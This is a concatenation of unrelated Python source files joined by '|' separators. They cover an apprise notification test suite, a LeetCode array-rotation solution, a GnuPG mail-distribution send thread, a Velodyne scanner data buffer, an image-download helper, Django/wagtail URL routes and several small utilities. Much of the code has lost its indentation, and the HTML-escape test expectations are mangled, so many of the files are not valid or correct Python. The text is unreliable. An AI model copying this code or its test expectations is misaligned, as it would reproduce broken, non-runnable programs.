# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import six
import pytest
from datetime import datetime
from datetime import timedelta
from apprise.plugins.NotifyBase import NotifyBase
from apprise import NotifyType
from apprise import NotifyImageSize
from timeit import default_timer
# Disable logging for a cleaner testing output
import logging
logging.disable(logging.CRITICAL)
def test_notify_base():
"""
API: NotifyBase() object
"""
# invalid types throw exceptions
with pytest.raises(TypeError):
NotifyBase(**{'format': 'invalid'})
# invalid types throw exceptions
with pytest.raises(TypeError):
NotifyBase(**{'overflow': 'invalid'})
# Bad port information
nb = NotifyBase(port='invalid')
assert nb.port is None
nb = NotifyBase(port=10)
assert nb.port == 10
try:
nb.url()
assert False
except NotImplementedError:
        # Each sub-module that inherits this as a parent is required to
        # override this function, so direct calls to it intentionally throw
        # a NotImplementedError
assert True
try:
nb.send('test message')
assert False
except NotImplementedError:
        # Each sub-module that inherits this as a parent is required to
        # override this function, so direct calls to it intentionally throw
        # a NotImplementedError
assert True
# Throttle overrides..
nb = NotifyBase()
nb.request_rate_per_sec = 0.0
start_time = default_timer()
nb.throttle()
elapsed = default_timer() - start_time
    # Should be a very fast response time since we set it to zero, but we'll
    # check for less than 0.5 seconds to be fair, as some testing systems may
    # be slower than others
assert elapsed < 0.5
# Concurrent calls should achieve the same response
start_time = default_timer()
nb.throttle()
elapsed = default_timer() - start_time
assert elapsed < 0.5
nb = NotifyBase()
nb.request_rate_per_sec = 1.0
# Set our time to now
start_time = default_timer()
nb.throttle()
elapsed = default_timer() - start_time
# A first call to throttle (Without telling it a time previously ran) does
# not block for any length of time; it just merely sets us up for
# concurrent calls to block
assert elapsed < 0.5
# Concurrent calls could take up to the rate_per_sec though...
start_time = default_timer()
nb.throttle(last_io=datetime.now())
elapsed = default_timer() - start_time
assert elapsed > 0.5 and elapsed < 1.5
nb = NotifyBase()
nb.request_rate_per_sec = 1.0
# Set our time to now
start_time = default_timer()
nb.throttle(last_io=datetime.now())
elapsed = default_timer() - start_time
# because we told it that we had already done a previous action (now)
# the throttle holds out until the right time has passed
assert elapsed > 0.5 and elapsed < 1.5
# Concurrent calls could take up to the rate_per_sec though...
start_time = default_timer()
nb.throttle(last_io=datetime.now())
elapsed = default_timer() - start_time
assert elapsed > 0.5 and elapsed < 1.5
nb = NotifyBase()
start_time = default_timer()
nb.request_rate_per_sec = 1.0
# Force a time in the past
nb.throttle(last_io=(datetime.now() - timedelta(seconds=20)))
elapsed = default_timer() - start_time
    # Should be a very fast response time since we set it to zero, but we'll
    # check for less than 0.5 seconds to be fair, as some testing systems may
    # be slower than others
assert elapsed < 0.5
# Force a throttle time
start_time = default_timer()
nb.throttle(wait=0.5)
elapsed = default_timer() - start_time
assert elapsed > 0.5 and elapsed < 1.5
# our NotifyBase wasn't initialized with an ImageSize so this will fail
assert nb.image_url(notify_type=NotifyType.INFO) is None
assert nb.image_path(notify_type=NotifyType.INFO) is None
assert nb.image_raw(notify_type=NotifyType.INFO) is None
# Color handling
assert nb.color(notify_type='invalid') is None
assert isinstance(
nb.color(notify_type=NotifyType.INFO, color_type=None),
six.string_types)
assert isinstance(
nb.color(notify_type=NotifyType.INFO, color_type=int), int)
assert isinstance(
nb.color(notify_type=NotifyType.INFO, color_type=tuple), tuple)
# Create an object
nb = NotifyBase()
# Force an image size since the default doesn't have one
nb.image_size = NotifyImageSize.XY_256
# We'll get an object this time around
assert nb.image_url(notify_type=NotifyType.INFO) is not None
assert nb.image_path(notify_type=NotifyType.INFO) is not None
assert nb.image_raw(notify_type=NotifyType.INFO) is not None
# But we will not get a response with an invalid notification type
assert nb.image_url(notify_type='invalid') is None
assert nb.image_path(notify_type='invalid') is None
assert nb.image_raw(notify_type='invalid') is None
# Static function testing
assert NotifyBase.escape_html("<content>'\t \n</content>") == \
'<content>'  \n</content>'
assert NotifyBase.escape_html(
"<content>'\t \n</content>", convert_new_lines=True) == \
'<content>'  <br/></content>'
# Test invalid data
assert NotifyBase.split_path(None) == []
assert NotifyBase.split_path(object()) == []
assert NotifyBase.split_path(42) == []
assert NotifyBase.split_path(
'/path/?name=Dr%20Disrespect', unquote=False) == \
['path', '?name=Dr%20Disrespect']
assert NotifyBase.split_path(
'/path/?name=Dr%20Disrespect', unquote=True) == \
['path', '?name=Dr Disrespect']
    # a slash found inside the path, if escaped properly, will not be broken
    # up by split_path, while additional concatenated slashes are ignored
# FYI: %2F = /
assert NotifyBase.split_path(
'/%2F///%2F%2F////%2F%2F%2F////', unquote=True) == \
['/', '//', '///']
# Test invalid data
assert NotifyBase.parse_list(None) == []
assert NotifyBase.parse_list(object()) == []
assert NotifyBase.parse_list(42) == []
result = NotifyBase.parse_list(
',path,?name=Dr%20Disrespect', unquote=False)
assert isinstance(result, list) is True
assert len(result) == 2
assert 'path' in result
assert '?name=Dr%20Disrespect' in result
result = NotifyBase.parse_list(',path,?name=Dr%20Disrespect', unquote=True)
assert isinstance(result, list) is True
assert len(result) == 2
assert 'path' in result
assert '?name=Dr Disrespect' in result
    # escaped slashes are handled by parse_list as well, while additional
    # concatenated slashes are ignored
    # FYI: %2F = /
    # In this list there are actually 4 entries, however parse_list
    # eliminates duplicates in addition to unquoting content by default
result = NotifyBase.parse_list(
',%2F,%2F%2F, , , ,%2F%2F%2F, %2F', unquote=True)
assert isinstance(result, list) is True
assert len(result) == 3
assert '/' in result
assert '//' in result
assert '///' in result
# Phone number parsing
assert NotifyBase.parse_phone_no(None) == []
assert NotifyBase.parse_phone_no(object()) == []
assert NotifyBase.parse_phone_no(42) == []
result = NotifyBase.parse_phone_no(
'+1-800-123-1234,(800) 123-4567', unquote=False)
assert isinstance(result, list) is True
assert len(result) == 2
assert '+1-800-123-1234' in result
assert '(800) 123-4567' in result
# %2B == +
result = NotifyBase.parse_phone_no(
'%2B1-800-123-1234,%2B1%20800%20123%204567', unquote=True)
assert isinstance(result, list) is True
assert len(result) == 2
assert '+1-800-123-1234' in result
assert '+1 800 123 4567' in result
# Give nothing, get nothing
assert NotifyBase.escape_html("") == ""
assert NotifyBase.escape_html(None) == ""
assert NotifyBase.escape_html(object()) == ""
# Test quote
assert NotifyBase.unquote('%20') == ' '
assert NotifyBase.quote(' ') == '%20'
assert NotifyBase.unquote(None) == ''
assert NotifyBase.quote(None) == ''
def test_notify_base_urls():
"""
API: NotifyBase() URLs
"""
    # Test the verify switch, which is used as part of SSL verification;
    # by default all SSL sites are verified unless this flag is set to
    # something like 'No', 'False', 'Disabled', etc. Boolean values are
    # pretty forgiving.
results = NotifyBase.parse_url('https://localhost:8080/?verify=No')
assert 'verify' in results
assert results['verify'] is False
results = NotifyBase.parse_url('https://localhost:8080/?verify=Yes')
assert 'verify' in results
assert results['verify'] is True
# The default is to verify
results = NotifyBase.parse_url('https://localhost:8080')
assert 'verify' in results
assert results['verify'] is True
# Password Handling
    # the password is parsed directly from the URL
results = NotifyBase.parse_url('https://user:pass@localhost')
assert 'password' in results
assert results['password'] == "pass"
# pass keyword over-rides default password
results = NotifyBase.parse_url(
'https://user:pass@localhost?pass=newpassword')
assert 'password' in results
assert results['password'] == "newpassword"
# password keyword can also optionally be used
results = NotifyBase.parse_url(
'https://user:pass@localhost?password=passwd')
assert 'password' in results
assert results['password'] == "passwd"
    # pass= takes priority over password= when both are supplied
results = NotifyBase.parse_url(
'https://user:pass@localhost?pass=pw1&password=pw2')
assert 'password' in results
assert results['password'] == "pw1"
# Options
results = NotifyBase.parse_url('https://localhost?format=invalid')
assert 'format' not in results
results = NotifyBase.parse_url('https://localhost?format=text')
assert 'format' in results
assert results['format'] == 'text'
results = NotifyBase.parse_url('https://localhost?format=markdown')
assert 'format' in results
assert results['format'] == 'markdown'
results = NotifyBase.parse_url('https://localhost?format=html')
assert 'format' in results
assert results['format'] == 'html'
results = NotifyBase.parse_url('https://localhost?overflow=invalid')
assert 'overflow' not in results
results = NotifyBase.parse_url('https://localhost?overflow=upstream')
assert 'overflow' in results
assert results['overflow'] == 'upstream'
results = NotifyBase.parse_url('https://localhost?overflow=split')
assert 'overflow' in results
assert results['overflow'] == 'split'
results = NotifyBase.parse_url('https://localhost?overflow=truncate')
assert 'overflow' in results
assert results['overflow'] == 'truncate'
# User Handling
    # the user is parsed directly from the URL
results = NotifyBase.parse_url('https://user:pass@localhost')
assert 'user' in results
assert results['user'] == "user"
    # the user= keyword over-rides the user parsed from the URL
results = NotifyBase.parse_url(
'https://user:pass@localhost?user=newuser')
assert 'user' in results
assert results['user'] == "newuser"
# Test invalid urls
assert NotifyBase.parse_url('https://:@/') is None
assert NotifyBase.parse_url('http://:@') is None
assert NotifyBase.parse_url('http://@') is None
assert NotifyBase.parse_url('http:///') is None
assert NotifyBase.parse_url('http://:test/') is None
assert NotifyBase.parse_url('http://pass:test/') is None
|
import logging
import random
import shutil
import time
import requests
logger = logging.getLogger(__name__)
RANDOM_WAITING_TIME = 5000
def get(url, params):
"""
send get request
:param url: destination url
:param params: parameters to send
:return: response as json data
"""
try:
        # sleep for a random duration (up to RANDOM_WAITING_TIME milliseconds) to spread out requests
        random_sleep_seconds = float(random.randint(0, RANDOM_WAITING_TIME)) / 1000.0
        logger.debug("sleeping for %f seconds", random_sleep_seconds)
        time.sleep(random_sleep_seconds)
r = requests.get(url, params, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
})
return r.json()
except Exception as ex:
logger.error(ex)
return None
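# A minimal usage sketch (the endpoint URL and parameters below are illustrative only,
# not part of this module):
if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    print(get("https://httpbin.org/get", {"page": 1}))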
|
import bottle
from wsgi_lineprof.middleware import LineProfilerMiddleware
app = bottle.app()
@app.route("/hello/<name>")
def index(name):
return bottle.template("<b>Hello {{name}}</b>!", name=name)
app = LineProfilerMiddleware(app)
if __name__ == "__main__":
bottle.run(host="localhost", port=8080, app=app)
|
test = [1, 456, 7, 6, 55, 9]
# track the smallest value seen so far (avoid shadowing the built-in min)
minimum = test[0]
for i in test:
    if i < minimum:
        minimum = i
print('The minimum is:', minimum)
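# For reference, the built-in min() gives the same result:
# print('The minimum is:', min(test))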
|
'''
Created on 13.06.2016
@author: Fabian Reiber
@version: 1.0
The MTASendThread sends the prepared re-encrypted mails to the recipients. If the origin mail was not
a re-encrypted mail, the thread needs to prepare the specific mail itself. It could be the correct mail or a
failure mail with the specific failure status. If the first send attempt fails, the thread waits and
tries again after 1 hour. If it fails again, it waits 2 hours between attempts until 3 days have passed.
In that case it sends an error mail to the origin sender using the same send process.
'''
import datetime
from smtplib import SMTPSenderRefused, SMTPRecipientsRefused, SMTPDataError
import smtplib
import socket
import threading
import time
from DistributerKeyManagement import DistributerKeyManager
from DistributerKeyManagementException.NoKeyException import NoKeyException
from DistributerManagement import DistributerManager
from DistributerManagementException.DBConnectionException import DBConnectionException
from DistributerManagementException.InvalidDistributerAddressException import InvalidDistributerAddressException
from DistributerManagementException.NoFingerprintException import NoFingerprintException
from GnuPGManagementCenter import GnuPGManager
from GnuPGManagementCenterException.NoDistributerKeyIDsException import NoDistributerKeyIDsException
from GnuPGManagementCenterException.SigningException import SigningException
from util import _util
from util.GnuPGSystemLogger import GnuPGSystemLogger
from utilException.NoMXRecordException import NoMXRecordException
class MTASendThread(threading.Thread):
__RETRY_FIRST_TIME = 3600 #1 hour
__RETRY_ELSE_TIME = 7200 # 2 hours
__SENDER_MSG_TIME = 259200 #3 days
"""
    Access to the signAndEncrypt method of GnuPGManager needs to be locked, because it
    performs read/write operations. If there is more than one MTASendThread, they
    could otherwise interfere with each other.
"""
__SIGN_AND_ENCRYPTLOCK = threading.Lock()
def __init__(self, distAddr, senderAddr, userInfo, addrFingerprintKeyInf, distKeyIDSig, distKeys, addrMsgDict,
group=None, target=None, name=None, args=(), kwargs=None, *, daemon=None):
threading.Thread.__init__(self, group=group, target=target, name=name, args=args, kwargs=kwargs)
"""
        A separate temporary gnupg directory is necessary, because the default temporary
        directory can't be locked for the MTASendThreads.
"""
self.gnupg = GnuPGManager.GnuPGManager(homeTmp='/tmp/.gnupgMTA')
self.timestamp = datetime.datetime.now().strftime("%A, %d. %B %Y %I:%M%p")
self.distAddr = distAddr
self.senderAddr = senderAddr
self.userInfoTmp = userInfo
self.distKeyIDSig = distKeyIDSig
self.distKeys = distKeys
self.addrMsgDict = addrMsgDict
self.addrFingerprintKeyInf = addrFingerprintKeyInf
self.sleepCounter = 0
self.retryFirst = False
self.recipientIsSenderFlag = False
"""
Logging only for server-side errors to trace problems.
"""
self.__logger = GnuPGSystemLogger('mtaSendThread')
def get_recipient_is_sender_flag(self):
return self.__recipientIsSenderFlag
def get_timestamp(self):
return self.__timestamp
def get_dist_addr(self):
return self.__distAddr
def get_sender_addr(self):
return self.__senderAddr
def get_user_info(self):
return self.__userInfo
def get_dist_key_idsig(self):
return self.__distKeyIDSig
def get_dist_keys(self):
return self.__distKeys
def get_addr_msg_dict(self):
return self.__addrMsgDict
def get_addr_fingerprint_key_inf(self):
return self.__addrFingerprintKeyInf
def get_sleep_counter(self):
return self.__sleepCounter
def get_retry_first(self):
return self.__retryFirst
def set_recipient_is_sender_flag(self, value):
self.__recipientIsSenderFlag = value
def set_timestamp(self, value):
self.__timestamp = value
def set_dist_addr(self, value):
self.__distAddr = value
def set_sender_addr(self, value):
self.__senderAddr = value
def set_user_info(self, value):
self.__userInfo = value
def set_dist_key_idsig(self, value):
self.__distKeyIDSig = value
def set_dist_keys(self, value):
self.__distKeys = value
def set_addr_msg_dict(self, value):
self.__addrMsgDict = value
def set_addr_fingerprint_key_inf(self, value):
self.__addrFingerprintKeyInf = value
def set_sleep_counter(self, value):
self.__sleepCounter = value
def set_retry_first(self, value):
self.__retryFirst = value
def run(self):
threading.Thread.run(self)
self.__sendAllMessages()
def __sendAllMessages(self):
"""
Iterates over the address-message-dictionary and send the message to the address.
If it was not possible to send messages, the thread will first sleep __RETRY_FIRST_TIME
and try it again. If it was not possible again for some messages it will sleep __RETRY_ELSE_TIME
until __SENDER_MSG_TIME is reached. Then the origin sender need to be informed.
1. case: If the address-message-dictionary is set, the origin message is re-encrypted.
2. case: If the address-message-dictionary is not set, the origin message is another message
and has his own user-information. Then the address-message-dictionary will be created (signed and
encrypted if it is possible or only signed).
"""
        # If the origin mail was re-encrypted, addrMsgDict is not None.
        # Otherwise it needs to be created by one of the prepare methods.
if not self.get_addr_msg_dict():
if self.get_addr_fingerprint_key_inf():
self.__prepareSigAndEncMsg()
else:
self.__prepareSigMsg()
addrMsgNotEmpty = True
addrMsgDictTmp = self.get_addr_msg_dict().copy()
while addrMsgNotEmpty:
for recipientAddr, mail in addrMsgDictTmp.items():
sended = self.__sendToMTA(recipientAddr, mail)
if sended:
del self.get_addr_msg_dict()[recipientAddr]
if self.get_addr_msg_dict():
if not self.get_retry_first():
time.sleep(MTASendThread.__RETRY_FIRST_TIME)
self.set_retry_first(True)
else:
if self.get_sleep_counter() * MTASendThread.__RETRY_ELSE_TIME == MTASendThread.__SENDER_MSG_TIME:
addrMsgNotEmpty = False
#If the recipient is the same as the sender it doesn't need to try it again.
if (not self.get_recipient_is_sender_flag()) and recipientAddr != self.get_sender_addr():
self.set_recipient_is_sender_flag(True)
self.__prepareErrorMSGForSender()
self.set_sleep_counter(0)
self.__logger.logError('COULD NOT SEND ALL MESSAGES TO RECIPIENTS\n' +
'SEND AN INFORMATION MESSAGE TO SENDER')
self.__sendAllMessages()
else:
time.sleep(MTASendThread.__RETRY_ELSE_TIME)
self.set_sleep_counter(self.get_sleep_counter() + 1)
else:
addrMsgNotEmpty = False
def __prepareSigAndEncMsg(self):
"""
Prepare a signed and encrypted message for the sender of the mail. It creates an
address-message-dictionary: {mail-address : signed and encrypted message}.
"""
try:
#It is necessary to send the distributer keys in the attachment.
if _util.objectsNotNone(self.get_dist_key_idsig(), self.get_dist_keys()):
msg = _util.generateMIMEMsg('mixed', self.get_dist_keys(), None, None, None, None, optinal=self.get_user_info())
else:
msg = _util.generateMIMEMsg('plain', self.get_user_info(), None, None, None, None)
if self.get_dist_key_idsig() is None:
(_distKeyIDEnc, distKeyIDSig) = self.gnupg.getKeyIDsFromDist(self.get_dist_addr())
self.set_dist_key_idsig(distKeyIDSig)
MTASendThread.__SIGN_AND_ENCRYPTLOCK.acquire()
addressMsgDict = self.gnupg.signAndEncrypt(self.get_addr_fingerprint_key_inf(), self.get_sender_addr(), msg, self.get_dist_addr(), '', self.get_dist_key_idsig())
MTASendThread.__SIGN_AND_ENCRYPTLOCK.release()
except NoDistributerKeyIDsException:
addressMsgDict = {}
userInfo = self.get_user_info() + '\nNO WAY TO SIGN AND ENCRYPT THIS MESSAGE' + '\nPLEASE CONTACT THE ADMINISTRATOR'
msg = _util.generateMIMEMsg('plain', userInfo, None, self.get_dist_addr(), self.get_sender_addr(), None)
addressMsgDict[self.get_sender_addr()] = msg
self.set_addr_msg_dict(addressMsgDict)
def __prepareSigMsg(self):
"""
        Prepare a signed message if an exception occurred in the process and it was not
        possible to get information about the sender of the mail in order to encrypt the
        message. It creates an address-message-dictionary: {mail-address : signed message}
"""
try:
userInfoTmp = 'FIRST ERROR: ' + self.get_user_info()
addressMsgDict = {}
if self.get_dist_key_idsig() is None:
(_distKeyIDEnc, distKeyIDSig) = self.gnupg.getKeyIDsFromDist(self.get_dist_addr())
self.set_dist_key_idsig(distKeyIDSig)
userInfoTmp = userInfoTmp + '\nNO WAY TO ENCRYPT THIS MESSAGE' + '\nMAYBE YOU NEED TO CONTACT THE ADMINISTRATOR'
msg = _util.generateMIMEMsg('plain', userInfoTmp, None, None, None, None)
signature = self.gnupg.signMsg(msg, self.get_dist_key_idsig())
msgSig = _util.generateMIMEMsg('signed', msg, signature, self.get_dist_addr(), self.get_sender_addr(), '')
addressMsgDict[self.get_sender_addr()] = msgSig
except (NoDistributerKeyIDsException, SigningException) as e:
userInfoTmp = userInfoTmp + ' \nNO WAY TO SIGN AND ENCRYPT THIS MESSAGE: ' + e.__str__() + '\nPLEASE CONTACT THE ADMINISTRATOR'
msg = _util.generateMIMEMsg('plain', userInfoTmp, None, self.get_dist_addr(), self.get_sender_addr(), None)
addressMsgDict[self.get_sender_addr()] = msg
self.set_addr_msg_dict(addressMsgDict)
def __prepareErrorMSGForSender(self):
"""
If it was not possible to send the re-encrypted mail to some of the recipients of the
distributer, it is necessary to inform the origin sender.
"""
dm = DistributerManager.DistributerManager()
dkm = DistributerKeyManager.DistributerKeyManager()
        userInfo = 'YOUR MESSAGE FROM ' + self.get_timestamp() + ' COULD NOT BE SENT TO ' + ', '.join(list(self.get_addr_msg_dict().keys()))
self.set_user_info(userInfo)
self.set_dist_keys(None)
addrFingerprintKeyInf = {}
try:
senderFingerprint = dm.getFingerprint(self.get_sender_addr(), self.get_dist_addr())
senderKey = dkm.getKeyFromUser(senderFingerprint)
addrFingerprintKeyInf[self.get_sender_addr()] = (senderFingerprint, senderKey)
self.set_addr_fingerprint_key_inf(addrFingerprintKeyInf)
self.__prepareSigAndEncMsg()
except (InvalidDistributerAddressException, NoFingerprintException, DBConnectionException, NoKeyException):
self.__prepareSigMsg()
def __sendToMTA(self, recipientAddr, mail):
"""
Send the message to the MTA of the recipient's mail provider. If it failed, it will be logged.
@param recipientAddr: Mail address of the recipient.
@param mail: The MIME-mail to send to the recipient.
"""
server = None
counter = 0
try:
records = _util.getMXRecords(recipientAddr)
for rec in records:
domain = str(rec.exchange)
server = smtplib.SMTP(domain)
#server.set_debuglevel(1)
server.starttls()
try:
server.sendmail(self.get_dist_addr(), recipientAddr, mail.as_string())
break
except (SMTPSenderRefused, SMTPRecipientsRefused, SMTPDataError) as e:
"""
No sendmail possible
"""
self.__logger.logError(e.__str__())
counter += 1
if counter == len(records):
return False
return True
except NoMXRecordException as e:
"""
Could not solve the MX-Record.
"""
self.__logger.logError(e.__str__())
except socket.gaierror as e:
"""
No SMTP instance.
"""
self.__logger.logError(e.__str__())
except (RuntimeError, ValueError) as e:
"""
No STARTTLS possible
"""
self.__logger.logError(e.__str__())
finally:
if server is not None:
server.quit()
return False
timestamp = property(get_timestamp, set_timestamp, None, None)
distAddr = property(get_dist_addr, set_dist_addr, None, None)
senderAddr = property(get_sender_addr, set_sender_addr, None, None)
userInfoTmp = property(get_user_info, set_user_info, None, None)
distKeyIDSig = property(get_dist_key_idsig, set_dist_key_idsig, None, None)
distKeys = property(get_dist_keys, set_dist_keys, None, None)
addrMsgDict = property(get_addr_msg_dict, set_addr_msg_dict, None, None)
addrFingerprintKeyInf = property(get_addr_fingerprint_key_inf, set_addr_fingerprint_key_inf, None, None)
sleepCounter = property(get_sleep_counter, set_sleep_counter, None, None)
retryFirst = property(get_retry_first, set_retry_first, None, None)
recipientIsSenderFlag = property(get_recipient_is_sender_flag, set_recipient_is_sender_flag, None, None)
|
'''
## Questions
### 189. [Rotate Array](https://leetcode.com/problems/rotate-array/)
Given an array, rotate the array to the right by k steps, where k is non-negative.
Example 1:
Input: [1,2,3,4,5,6,7] and k = 3
Output: [5,6,7,1,2,3,4]
Explanation:
rotate 1 steps to the right: [7,1,2,3,4,5,6]
rotate 2 steps to the right: [6,7,1,2,3,4,5]
rotate 3 steps to the right: [5,6,7,1,2,3,4]
Example 2:
Input: [-1,-100,3,99] and k = 2
Output: [3,99,-1,-100]
Explanation:
rotate 1 steps to the right: [99,-1,-100,3]
rotate 2 steps to the right: [3,99,-1,-100]
Note:
Try to come up as many solutions as you can, there are at least 3 different ways to solve this problem.
Could you do it in-place with O(1) extra space?
'''
## Solutions
from typing import List


class Solution:
def rotate(self, nums: List[int], k: int) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
nums.reverse()
while k > 0:
nums.append(nums.pop(0))
k = k - 1
nums.reverse()
# Runtime: 80 ms
# Memory Usage: 13.4 MB
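# The note above asks for an in-place, O(1) extra-space approach. A common alternative
# (a sketch, not part of the original submission) is the three-reversal trick: reverse
# the whole array, then reverse the first k elements, then reverse the remainder.
class SolutionReversal:
    def rotate(self, nums, k):
        """Rotate nums right by k steps using three in-place reversals."""
        n = len(nums)
        if n == 0:
            return
        k %= n

        def reverse(lo, hi):
            # reverse nums[lo:hi + 1] in place
            while lo < hi:
                nums[lo], nums[hi] = nums[hi], nums[lo]
                lo += 1
                hi -= 1

        reverse(0, n - 1)   # [1,2,3,4,5,6,7] -> [7,6,5,4,3,2,1]
        reverse(0, k - 1)   # k=3: [5,6,7,4,3,2,1]
        reverse(k, n - 1)   # [5,6,7,1,2,3,4]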
|
# encoding: utf-8
"""Gevent-based WSGI server adapter."""
# ## Imports
from __future__ import unicode_literals, print_function
from gevent.pywsgi import WSGIServer
# ## Server Adapter
def serve(application, host='127.0.0.1', port=8080):
"""Gevent-based WSGI-HTTP server."""
# Instantiate the server with a host/port configuration and our application.
WSGIServer((host, int(port)), application).serve_forever()
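# A minimal usage sketch (the trivial WSGI app below is illustrative only, not part of this module):
#
#     def hello_app(environ, start_response):
#         start_response('200 OK', [('Content-Type', 'text/plain')])
#         return [b'Hello, world!\n']
#
#     serve(hello_app, host='127.0.0.1', port=8080)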
|
#!/usr/bin/env python
"""
tools and basic classes
"""
import os
# import random
# from abc import ABC
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs
# from html.entities import name2codepoint
import requests
# import time
import sys
USER_AGENT = (
'Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) '
'AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/34.0.1847.114 Mobile Safari/537.36'
)
def get_attr(attrs: list, attr: str):
for attr_name, attr_value in attrs:
if attr_name == attr:
return attr_value
return None
def get_page(page, headers=False, cookies=False):
""" get page """
if cookies:
_cookies = cookies
else:
_cookies = dict()
if headers:
_headers = headers
else:
_headers = {
'user-agent': USER_AGENT,
'referer': page,
}
request = requests.get(
page,
headers=_headers,
cookies=_cookies,
)
return request.text
def save_file(file_url:str, dst_dir:str):
if not os.path.isdir(dst_dir):
os.mkdir(dst_dir)
dst_file_name = os.path.join(
dst_dir,
os.path.basename(urlparse(file_url).path))
if os.path.exists(dst_file_name):
return dst_file_name, 0, 'already downloaded'
try:
request_image = requests.get(file_url, stream=True, headers={'user-agent': USER_AGENT,})
except requests.exceptions.ConnectionError:
return dst_file_name, -1, 'connection error'
if request_image.status_code == 200:
with open(dst_file_name, 'wb') as f:
for chunk in request_image:
f.write(chunk)
return dst_file_name, request_image.status_code, request_image.reason
def get_file_name(file_path):
(head, tail) = os.path.split(file_path)
(file_name, ext) = os.path.splitext(tail)
return file_name
class ImageSite:
def __init__(self, start_page, parser):
self.start_page = start_page
self.parser = parser
# Print iterations progress
def printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█', printEnd = "\r"):
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
length - Optional : character length of bar (Int)
fill - Optional : bar fill character (Str)
printEnd - Optional : end character (e.g. "\r", "\r\n") (Str)
"""
percent = ("{0:." + str(decimals) + "f}").format(100 * (iteration / float(total)))
filledLength = int(length * iteration // total)
bar = fill * filledLength + '-' * (length - filledLength)
print(f'\r{prefix} |{bar}| {percent}% {suffix}', end = printEnd)
# Print New Line on Complete
if iteration == total:
print()
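# A minimal usage sketch for printProgressBar (kept as comments so importing this module
# stays side-effect free; the item count below is illustrative only):
#
#     total = 57
#     printProgressBar(0, total, prefix='Progress:', suffix='Complete', length=50)
#     for i in range(total):
#         # ... do the work for item i ...
#         printProgressBar(i + 1, total, prefix='Progress:', suffix='Complete', length=50)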
if __name__ == '__main__':
print('imggetter classes and tools')
try:
print(save_file(sys.argv[1], 'tmp'))
except IndexError:
print(save_file('https://cdn.imagefap.com/images/full/63/710/710717099.jpg?end=1614172686&secure=0715f1e51a9ff08dc66bf', 'tmp'))
|
ctx.addClock ("clk", 12)
#ctx.addClock ("clk20", 19.875)
ctx.addClock ("clk33", 33)
|
from django.conf.urls import url
from wagtailvideos.views import chooser, multiple, videos
app_name = 'wagtailvideos'
urlpatterns = [
url(r'^$', videos.index, name='index'),
url(r'^(\d+)/$', videos.edit, name='edit'),
url(r'^(\d+)/delete/$', videos.delete, name='delete'),
url(r'^(\d+)/create_transcode/$', videos.create_transcode, name='create_transcode'),
url(r'^add/$', videos.add, name='add'),
url(r'^usage/(\d+)/$', videos.usage, name='video_usage'),
url(r'^multiple/add/$', multiple.add, name='add_multiple'),
url(r'^multiple/(\d+)/$', multiple.edit, name='edit_multiple'),
url(r'^multiple/(\d+)/delete/$', multiple.delete, name='delete_multiple'),
url(r'^chooser/$', chooser.chooser, name='chooser'),
url(r'^chooser/(\d+)/$', chooser.video_chosen, name='video_chosen'),
url(r'^chooser/upload/$', chooser.chooser_upload, name='chooser_upload'),
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author: Florian Timm
@version: 2017.12.12
"""
import os
import signal
import socket
from datetime import datetime
from multiprocessing import Process
from vdInterface import VdInterface
class VdBuffer(Process):
""" process for buffering binary data """
def __init__(self, master):
"""
Constructor
:param master: instance of VdAutoStart
:type master: VdAutoStart
"""
# constructor of super class
Process.__init__(self)
        # save references to the shared state handed over by the master process
# self.__master = master
self.__go_on_buffering = master.go_on_buffer
self.__scanner_status = master.scanner_status
self.__datasets = master.dataset_cnt
self.__queue = master.queue
self.__admin = master.admin
self.__date = master.date
self.__conf = master.conf
self.__file_no = 0
@staticmethod
def __signal_handler(sig_no, frame):
"""
handles SIGINT-signal
:param sig_no: signal number
:type sig_no: int
:param frame:execution frame
:type frame: frame
"""
del sig_no, frame
# self.master.end()
print("SIGINT vdBuffer")
def __new_folder(self):
""" creates data folder """
# checks time for file name and runtime
self.__date.value = datetime.now()
dir = self.__conf.get("file", "namePre")
dir += self.__date.value.strftime(
self.__conf.get("file", "timeFormat"))
self.__folder = dir + "/_buffer"
# make folder
os.makedirs(self.__folder)
os.makedirs(dir + "/_transformed")
print("Data folder: " + self.__folder)
def run(self):
""" starts buffering process """
signal.signal(signal.SIGINT, self.__signal_handler)
# open socket to scanner
sock = VdInterface.get_data_stream(self.__conf)
self.__scanner_status.value = "Socket connected"
buffer = b''
datasets_in_buffer = 0
self.__datasets.value = 0
# process priority
if self.__admin:
os.nice(-18)
transformer = self.__conf.get(
"functions",
"activateTransformer") == "True"
measurements_per_dataset = int(self.__conf.get(
"device", "valuesPerDataset"))
bufferTakt = int(self.__conf.get(
"file", "takt"))
sock.settimeout(1)
while self.__go_on_buffering.value:
try:
# get data from scanner
data = sock.recvfrom(1248)[0]
if datasets_in_buffer == 0 and self.__file_no == 0:
self.__new_folder()
# RAM-buffer
buffer += data
datasets_in_buffer += 1
self.__datasets.value += measurements_per_dataset
                # save buffered data to a file every `bufferTakt` datasets
                # (roughly every 5 or 10 seconds)
if (datasets_in_buffer >= bufferTakt) or \
(not self.__go_on_buffering.value):
# write file
f = open(
self.__folder + "/" + str(self.__file_no) + ".bin",
"wb")
f.write(buffer)
f.close()
if transformer:
self.__queue.put(f.name)
# clear buffer
buffer = b''
datasets_in_buffer = 0
# count files
self.__file_no += 1
                # data is bytes, so compare against a bytes literal
                if data == b'QUIT':
break
except socket.timeout:
print("No data")
continue
sock.close()
self.__scanner_status.value = "recording stopped"
print("Disconnected!")
|
"""
Support for Tellstick sensors.
